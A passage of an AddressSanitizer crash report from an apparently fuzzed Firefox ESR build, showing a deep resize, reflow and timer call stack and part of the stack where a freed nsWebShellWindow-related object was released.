#159 0x7fce4951fc6d in ReflowFinished /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:817:5
#160 0x7fce4951fc6d in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:812
#161 0x7fce4920e753 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4013:12
#162 0x7fce4920e753 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#163 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#164 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#165 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#166 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#167 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#168 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#169 0x7fce4a05c034 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:298:5
#170 0x7fce4a05c034 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
#171 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
#172 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
#173 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
#174 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
#175 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
#176 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
#177 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#178 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#179 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#180 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#181 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#182 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#183 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#184 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#185 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#186 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#187 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#188 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#189 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#190 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#191 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#192 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#193 0x7fce44d87167 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
#194 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
#195 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
#196 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
#197 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
#198 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#199 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
#200 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
#201 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#202 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#203 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
#204 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
#205 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
#206 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#207 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#208 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#209 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#210 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#211 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#212 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#213 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#214 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#215 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#216 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#217 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#218 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#219 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#220 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#221 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#222 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#223 0x7fce46fc430a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#224 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#225 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#226 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#227 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#228 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#229 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
#230 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
#231 0x7fce4920e7e6 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4054:3
#232 0x7fce4920e7e6 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4022
#233 0x7fce4920e7e6 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#234 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#235 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#236 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#237 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#238 0x7fce4918012b in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2019:5
#239 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#240 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#241 0x7fce4511d224 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2500:5
#242 0x7fce4511cc7e in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2472:3
#243 0x7fce4951fc6d in ReflowFinished /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:817:5
#244 0x7fce4951fc6d in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:812
#245 0x7fce4920e753 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4013:12
#246 0x7fce4920e753 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#247 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#248 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#249 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#250 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#251 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#252 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#253 0x7fce4a05c034 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:298:5
#254 0x7fce4a05c034 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
#255 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
#256 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
#257 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
#258 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
#259 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
#260 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
#261 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#262 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#263 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#264 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#265 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#266 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#267 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#268 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#269 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#270 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#271 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#272 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#273 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#274 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#275 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#276 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#277 0x7fce44d87167 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
#278 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
#279 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
#280 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
#281 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
#282 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#283 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
#284 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
#285 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#286 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#287 0x7fce43252d5f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#288 0x7fce431c48b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#289 0x7fce431c48b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#290 0x7fce431c48b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#291 0x7fce48865c6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#292 0x7fce4a8e4071 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#293 0x7fce4aa7b387 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
#294 0x7fce4aa7cafd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
#295 0x7fce4aa7d9bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
#296 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
#297 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
#298 0x7fce5de8382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#299 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)
0x61200022e6db is located 155 bytes inside of 264-byte region [0x61200022e640,0x61200022e748)
freed by thread T0 here:
#0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7fce4a064007 in Release /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:125:1
#2 0x7fce4a064007 in Release /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:103
#3 0x7fce4a064007 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
#4 0x7fce4a064007 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:399
#5 0x7fce4a064007 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
#6 0x7fce4a064007 in ~WebShellWindowTimerCallback /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:530
#7 0x7fce4a064007 in mozilla::WebShellWindowTimerCallback::Release() /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:535
#8 0x7fce424356fb in ~Callback /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.h:83:9
#9 0x7fce424356fb in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:513
#10 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#11 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#12 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#13 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
#14 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
#15 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
#16 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#17 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#18 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#19 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#20 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#21 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#22 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#23 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#24 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#25 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#26 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#27 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#28 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#29 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#30 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#31 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#32 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#33 0x7fce46fc430a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#34 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#35 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#36 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
